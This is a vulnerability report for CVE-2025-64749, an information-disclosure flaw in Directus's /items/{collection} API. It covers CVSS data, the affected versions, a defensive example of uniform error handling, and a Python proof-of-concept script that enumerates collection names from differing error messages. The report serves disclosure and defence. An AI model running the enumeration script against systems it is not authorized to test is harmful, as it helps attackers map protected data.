Security Vulnerability Report
CVE-2025-64749 (CVSS 4.3 MEDIUM)

Published: 2025-11-13 22:15:52
Last Modified: 2025-12-08 15:02:34

Description

Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when a user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users who are not authorized to access those collections. Version 11.13.0 fixes the issue.
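As an added illustration (not Directus code and not its actual patch), the error-message oracle described above modelled as a toy `/items/{collection}` handler next to a hardened variant that answers identically for "exists but denied" and "does not exist"; the collection names, roles and message strings are constructed:

```python
from typing import Callable, Tuple

# Added example, not Directus code or its real fix: a toy /items/{collection}
# handler showing the CWE-203/CWE-209 error-message oracle from CVE-2025-64749,
# beside a hardened variant. Collection names, roles and messages are constructed.
EXISTING = {"articles", "invoices", "directus_users"}
ACL = {"editor": {"articles"}, "public": set()}

Handler = Callable[[str, str], Tuple[int, str]]


def items_leaky(collection: str, role: str) -> Tuple[int, str]:
    """Pre-fix shape: existence is checked first and the two failure
    branches answer differently, so a denied caller can tell them apart."""
    if collection not in EXISTING:
        return 404, f'Collection "{collection}" does not exist.'
    if collection not in ACL.get(role, set()):
        return 403, "Forbidden."
    return 200, f"items of {collection}"


def items_uniform(collection: str, role: str) -> Tuple[int, str]:
    """Hardened shape: one combined check and one identical error
    (same status, same body) whether the collection is missing or denied."""
    if collection in ACL.get(role, set()) and collection in EXISTING:
        return 200, f"items of {collection}"
    return 403, "Forbidden."


def leaks_existence(handler: Handler, role: str) -> bool:
    """Regression check: the caller is denied "invoices" (which exists) and
    then asks for a name that does not exist; any difference is the oracle."""
    denied = handler("invoices", role)
    missing = handler("no_such_collection_xyz", role)
    return denied != missing
```

A regression test of this shape belongs in the API test suite; it must compare the whole response (status code and body), since a uniform body with differing status codes is still an oracle.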

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-64749 PoC - Directus Collection Enumeration
# This PoC demonstrates the information disclosure vulnerability

TARGET_URL = "http://target-directus-instance.com"  # Replace with actual target URL

# Common collection name patterns to test
COMMON_COLLECTIONS = [
    "users", "settings", "files", "roles", "permissions", "activity",
    "collections", "fields", "presets", "folders",
    "directus_collections", "directus_fields", "custom_collection"
]


def check_collection_exists(collection_name, token=None):
    """
    Send request to /items/{collection} endpoint
    Returns the error message from the response
    """
    url = f"{TARGET_URL}/items/{collection_name}"
    headers = {
        "Content-Type": "application/json"
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    try:
        response = requests.get(url, headers=headers, timeout=10)
        return response.json()
    except Exception as e:
        return {"error": str(e)}


def analyze_error_message(response_data):
    """
    Analyze error message to determine if collection exists
    The vulnerability allows distinguishing between:
    - Collection exists but user lacks permission
    - Collection does not exist
    """
    error_msg = str(response_data).lower()
    # Check for signs of existing collection (permission denied)
    if "forbidden" in error_msg or "access denied" in error_msg or "permissions" in error_msg:
        return "EXISTS_NO_ACCESS"
    # Check for non-existing collection
    if "not found" in error_msg or "collection" not in error_msg:
        return "NOT_EXISTS"
    return "UNKNOWN"


def main():
    print("[*] CVE-2025-64749 PoC - Directus Collection Enumeration")
    print(f"[*] Target: {TARGET_URL}\n")
    discovered_collections = []
    for collection in COMMON_COLLECTIONS:
        print(f"[*] Testing collection: {collection}")
        response = check_collection_exists(collection)
        result = analyze_error_message(response)
        if result == "EXISTS_NO_ACCESS":
            print(f"  [+] Collection '{collection}' EXISTS (no access)")
            discovered_collections.append(collection)
        elif result == "NOT_EXISTS":
            print(f"  [-] Collection '{collection}' does not exist")
        else:
            print(f"  [?] Unknown response for '{collection}'")
    print("\n[*] Summary:")
    print(f"  Discovered {len(discovered_collections)} collections:")
    for col in discovered_collections:
        print(f"  - {col}")


if __name__ == "__main__":
    main()

References

https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31 (Patch)
https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr (Exploit, Vendor Advisory)

Weaknesses

CWE-203 (Observable Discrepancy)
CWE-209 (Generation of Error Message Containing Sensitive Information)

NVD Status: Analyzed (exploitability score 2.8, impact score 1.4)